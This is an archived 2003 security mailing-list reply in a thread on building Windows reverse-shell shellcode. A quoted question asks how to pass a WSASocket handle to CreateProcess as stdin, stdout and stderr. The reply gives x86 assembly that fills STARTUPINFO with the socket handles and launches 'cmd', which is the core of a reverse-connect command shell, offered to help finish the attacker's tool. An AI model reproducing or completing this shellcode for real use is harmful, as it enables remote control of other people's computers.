Re: Windows reverse Shell

From: sk (sk@scan-associates.net)
Date: 02/04/03

Next message: Berend-Jan Wever: "Re: Windows reverse Shell"

Previous message: 3APA3A: "Re[2]: Windows reverse Shell"
In reply to: NetNinja: "Windows reverse Shell"
Next in thread: Berend-Jan Wever: "Re: Windows reverse Shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "sk" <sk@scan-associates.net>
To: "SecFocus" <netninja@hotmail.kg>, <vuln-dev@securityfocus.com>
Date: Wed, 5 Feb 2003 00:42:54 +0800

If I remember correctly, that shellcode dont have "bind" function. A reverse
connect shellcode dont need "bind". WSASocket() will return a
non-overlapping socket, so it can be used as in/out/err handler in
CreateProcess(), there is really nothing extra you need to do. Since you got
a connection in your nc, the problem should be in your CreateProcess(). Try
to check if your StartupInfo flags has STARTF_USESTDHANDLES.

I dont have C code for this, but in asm, it could be something like this:

;ebx = socket
xor ecx,ecx
mov cl,11h
push edi
mov edi,ebp
rep stos dword ptr [edi] ;zero up startupinfo
pop edi
mov byte ptr [ebp],44h ;STARTUPINFO size
mov dword ptr [ebp+3Ch],ebx ;output handler
mov dword ptr [ebp+38h],ebx ;input handler
mov dword ptr [ebp+40h],ebx ;error handler
mov word ptr [ebp+2Ch],0101h
;STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW
lea eax,[ebp+44h]
push eax
push ebp
push ecx
push ecx
push ecx
inc ecx
push ecx
dec ecx
push ecx
push ecx
push esi ;"cmd",0
push ecx
call dword ptr [edi-28] ;CreateProcess

sk
----- Original Message -----
From: "NetNinja" <netninja@hotmail.kg>
To: <vuln-dev@securityfocus.com>
Sent: Tuesday, February 04, 2003 3:37 AM
Subject: Windows reverse Shell

> Hello guys,
>
> David Litchfield in his Blackhat talk, talked about using socket handle
> from WSASocket() and pass that handle as a parameter to stdin, stdout
> and stderr for CreateProcess function. By doin this way his reverse
> cmd shellcode becomes much smaller. I tried coding that reverse
> command shell in C, but couldnt get it to work. It simply connects to
> my listening netcat listener and then disconnects. David Litchfield
> used 4 functions to achieva that WSASocket, bind, connect and
> CreateProcess. A lil help would b appreciated on building this reverse
> cmd shell. thanx.
>
>
> --
> Best regards,
> A*** mailto:netninja@hotmail.kg

Next message: Berend-Jan Wever: "Re: Windows reverse Shell"
Previous message: 3APA3A: "Re[2]: Windows reverse Shell"
In reply to: NetNinja: "Windows reverse Shell"
Next in thread: Berend-Jan Wever: "Re: Windows reverse Shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]